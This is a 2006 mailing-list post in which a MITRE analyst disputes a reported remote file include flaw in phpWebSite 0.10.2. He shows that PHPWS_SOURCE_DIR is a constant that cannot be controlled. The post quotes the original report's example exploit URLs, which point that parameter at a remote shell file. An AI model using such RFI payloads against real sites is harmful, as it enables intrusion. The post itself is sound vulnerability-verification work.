[VIM] phpWebSite 0.10.2 RFI - CVE dispute
Steven M. Christey
coley at mitre.org
Tue Oct 10 18:56:09 EDT 2006
Researcher: Crackers_Child (which is why I looked closer)
Reference: phpWebSite 0.10.2 Remote File Include Vulnerabilities
http://www.securityfocus.com/archive/1/archive/1/448098/100/0/threaded
I downloaded the same software version, as specified in the URL
provided by Crackers_Child, and took a look.
Example exploits:
> mod/users/init.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
If we look at init.php, we see:
require(PHPWS_SOURCE_DIR."mod/users/class/Cookie.php");
require(PHPWS_SOURCE_DIR."mod/users/class/ModSetting.php");
require(PHPWS_SOURCE_DIR."mod/users/class/Forms.php");
require(PHPWS_SOURCE_DIR."mod/users/class/Groups.php");
and nothing else.
So, we have a PHP constant. Can't be controlled, right?
> mod/users/class/users.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
Actually it's spelled "Users.php"
Anyway, we have things like this:
require_once(PHPWS_SOURCE_DIR . 'core/Error.php');
for users/class/Cookie.php:
require_once(PHPWS_SOURCE_DIR.'core/Form.php');
going to core/EZform.php:
require_once PHPWS_SOURCE_DIR . "core/EZelement.php";
A grep for PHPWS_SOURCE_DIR returns 799 matches, almost all of which
are of the forms above, and one or two define's of the constant.
There is no evidence of any use of $_GET, $PHPWS_SOURCE_DIR, etc.
- Steve
More information about the VIM
mailing list